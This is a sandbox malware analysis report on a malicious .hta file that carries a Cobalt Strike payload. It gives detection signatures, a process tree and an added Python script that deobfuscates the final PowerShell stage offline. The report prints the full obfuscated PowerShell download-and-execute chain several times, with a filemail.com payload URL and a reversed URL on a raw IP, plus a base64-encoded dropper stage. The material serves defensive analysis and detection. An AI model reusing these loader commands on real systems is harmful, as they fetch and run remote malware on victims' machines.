
Windows Analysis Report
greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta

Overview

General Information

Sample name: greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta
Analysis ID: 1564308
MD5: af5174392d590a5b515ab1dcacfc79c6
SHA1: 28697fe6ef17f0a714e89505495d60e10b40b8f3
SHA256: a09dc85606cb624d221defe49d7df873af0064acb6e81d14ba646c1aa38936ee
Tags: hta, user-abuse_ch

Detection

Cobalt Strike, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 6848 cmdline: mshta.exe "C:\Users\user\Desktop\greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 6248 cmdline: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'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'+[cHar]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2336 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 2188 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 4228 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2022.tmp" "c:\Users\user\AppData\Local\Temp\w0uathue\CSC6F7F1D769E649D6AA11CFF4BFABFB3.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 2044 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 7064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2492 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
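The PID 2492 command line above is the last PowerShell stage in the tree, and everything that makes it hard to read is mechanical: single-quoted literals split with '+', three -replace operations that map the tokens Dfw, N9Y and hGa back to the quote, pipe and dollar characters, a first Invoke argument written backwards, and a sink built from `$env:ComSpec[4,24,25]`, which on a default install spells `iex`. The script below is an added triage helper written for this page, not code from the report or from Joe Sandbox. It embeds the PowerShell literal copied from that command line, undoes the obfuscation offline, pulls out the filemail.com download URL and the reversed next-stage URL, and carves a reversed-base64 blob the same way the loader does, run here on a constructed sample because the filemail.com payload is not on this page. The `C:\Windows\system32\cmd.exe` value of ComSpec is an assumption.

```python
"""Offline triage of the PowerShell obfuscation in the PID 2492 command line (added example)."""
import base64
import re

# Content of the single-quoted PowerShell literal, copied from the PID 2492 command line in
# the report, before the -creplace/-replace chain is applied to it.
PAYLOAD = (
    "hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+"
    "'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid="
    "e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;"
    "hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = "
    "[System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;"
    "hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);"
    "hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt "
    "hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - "
    "hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);"
    "hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })"
    "[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String("
    "hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);"
    "hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, "
    "@(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, "
    "Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,"
    "DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));"
)

CONCAT = "'+'"  # closes one single-quoted literal and opens the next; noise once joined

# The command line's own substitution table, in the order PowerShell applies it:
#   -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39    "Dfw" -> "'"
#   -cREpLACE 'N9Y',[Char]124                           "N9Y" -> "|"
#   -RePLACE ([Char]104+[Char]71+[Char]97),[Char]36     "hGa" -> "$"
SUBSTITUTIONS = (("Dfw", "'"), ("N9Y", "|"), ("hGa", "$"))


def deobfuscate(payload: str) -> str:
    """Join the split literals first (the token Dfw is itself split as Df'+'w),
    then apply the token substitutions exactly as the -replace chain would."""
    text = payload.replace(CONCAT, "")
    for token, replacement in SUBSTITUTIONS:
        text = text.replace(token, replacement)
    return text


def comspec_slice(indices, comspec="C:\\Windows\\system32\\cmd.exe") -> str:
    """$env:ComSpec[4,24,25] -join '' picks characters out of the cmd.exe path.
    The default ComSpec value is assumed here."""
    return "".join(comspec[i] for i in indices)


def invoke_arguments(script: str) -> list:
    """Argument list handed to [dnlib.IO.Home]::VAI through .Invoke($null, @(...))."""
    m = re.search(r"\.Invoke\(\$null, @\((.*?)\)\);", script, re.DOTALL)
    return re.findall(r"'([^']*)'", m.group(1)) if m else []


def unreverse(value: str) -> str:
    """The loader passes its next-stage URL reversed; flip anything that is a URL backwards."""
    flipped = value[::-1]
    return flipped if flipped.lower().startswith(("http://", "https://")) else value


def indicators(script: str) -> dict:
    """Network indicators an analyst wants out of the deobfuscated stage."""
    urls = re.findall(r"https?://[^\s']+", script)
    args = invoke_arguments(script)
    return {
        "stage_url": urls[0] if urls else None,
        "next_stage_url": unreverse(args[0]) if args else None,
        "invoke_args": [unreverse(a) for a in args],
    }


def carve_assembly(blob: str, start="<<BASE64_START>>", end="<<BASE64_END>>") -> bytes:
    """Same carving the loader performs on the downloaded text: take what sits between the
    markers, reverse it, base64-decode it. Returns b'' when the markers are absent."""
    s, e = blob.find(start), blob.find(end)
    if s < 0 or e <= s:
        return b""
    return base64.b64decode(blob[s + len(start):e][::-1])


if __name__ == "__main__":
    clean = deobfuscate(PAYLOAD)
    print(clean.replace(";", ";\n"))
    print(indicators(clean))
    print("sink:", comspec_slice([4, 24, 25]))
```

The order matters: the split literals have to be joined before the token substitution, otherwise `Df'+'w` never becomes a quote. The recovered first Invoke argument points at the same 23.95.128.215/226/ directory the first stage used; the base64 in the PID 6248 command line (reproduced in the Sigma matches below) decodes to an Add-Type P/Invoke of urlmon URLDownloadToFile that fetched the .vBs dropper into %APPDATA% from that directory, which is what produced the csc.exe child and the file-created event for seethepossiblethingsforentiretimetogivemebest.vBs.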
No configs have been found
Source | Rule | Description | Author | Strings
greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta | JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security
Process Memory Space: powershell.exe PID: 7064 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
    • 0x47c9:$b3: ::UTF8.GetString(
    • 0x5131:$b3: ::UTF8.GetString(
    • 0x5c9d:$b3: ::UTF8.GetString(
    • 0x6c01:$b3: ::UTF8.GetString(
    • 0x226a6:$b3: ::UTF8.GetString(
    • 0x235b6:$b3: ::UTF8.GetString(
    • 0x23f1e:$b3: ::UTF8.GetString(
    • 0x24b2f:$b3: ::UTF8.GetString(
    • 0x3bc3d:$b3: ::UTF8.GetString(
    • 0x59fc0:$b3: ::UTF8.GetString(
    • 0x5a912:$b3: ::UTF8.GetString(
    • 0x5aca7:$b3: ::UTF8.GetString(
    • 0x606ef:$b3: ::UTF8.GetString(
    • 0x60d34:$b3: ::UTF8.GetString(
    • 0x625f1:$b3: ::UTF8.GetString(
    • 0x62d36:$b3: ::UTF8.GetString(
    • 0x636b3:$b3: ::UTF8.GetString(
    • 0x63d7d:$b3: ::UTF8.GetString(
    • 0x72d59:$b3: ::UTF8.GetString(
    • 0x740a9:$b3: ::UTF8.GetString(
    • 0x749fb:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 2492 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: powershell.exe PID: 2492 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
    • 0xdfe0a:$b2: ::FromBase64String(
    • 0x131b68:$b2: ::FromBase64String(
    • 0x1335ca:$b2: ::FromBase64String(
    • 0x133ab3:$b2: ::FromBase64String(
    • 0x1ee2:$b3: ::UTF8.GetString(
    • 0x4680:$b3: ::UTF8.GetString(
    • 0x57df3:$b3: ::UTF8.GetString(
    • 0x584ab:$b3: ::UTF8.GetString(
    • 0x77b93:$b3: ::UTF8.GetString(
    • 0x7824b:$b3: ::UTF8.GetString(
    • 0x92779:$b3: ::UTF8.GetString(
    • 0x92e38:$b3: ::UTF8.GetString(
    • 0x9375f:$b3: ::UTF8.GetString(
    • 0x93fe9:$b3: ::UTF8.GetString(
    • 0x9ba58:$b3: ::UTF8.GetString(
    • 0x9c110:$b3: ::UTF8.GetString(
    • 0x9e310:$b3: ::UTF8.GetString(
    • 0xbab00:$b3: ::UTF8.GetString(
    • 0xde130:$b3: ::UTF8.GetString(
    • 0xdfc11:$b3: ::UTF8.GetString(
    • 0xe3598:$b3: ::UTF8.GetString(
amsi32_6248.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security
amsi32_2492.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

          System Summary

          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6
          Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = 
Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod(
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile 
-command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod(
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile 
-command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod(
